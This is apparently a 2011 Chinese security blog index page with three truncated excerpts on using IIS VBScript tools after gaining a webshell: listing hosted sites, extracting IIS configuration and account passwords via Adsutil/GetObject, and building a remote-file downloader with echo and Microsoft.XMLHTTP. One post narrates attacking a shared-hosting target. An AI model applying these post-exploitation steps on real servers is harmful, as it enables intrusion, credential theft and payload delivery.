iis的几个vbs脚本在渗透中的应用

   
分类:安全 | 2011-08-26 | 撸过 2,252 次
0人扯蛋

有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法

1.查询IIS里的所有网站

C:WINDOWSsystem32>cscript.exe iisweb.vbs /query
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

正在连接到服务器 …已完成。
Site Name (Metabase Path) Status IP Port Host

===============================[......]

继续阅读

使用Adsutil.vbs脚本获取IIS配置信息及账号密码

   
分类:安全 | 2011-08-26 | 撸过 2,743 次
0人扯蛋

今晚在搞http://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。

无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNum[......]

继续阅读

实用vbs

   
分类:安全 | 2011-08-18 | 撸过 1,015 次
0人扯蛋

转自:黑鹰小子

1.文件下载(无回显)

echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.vbe
echo xPost.Open “GET”,iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGe[......]

继续阅读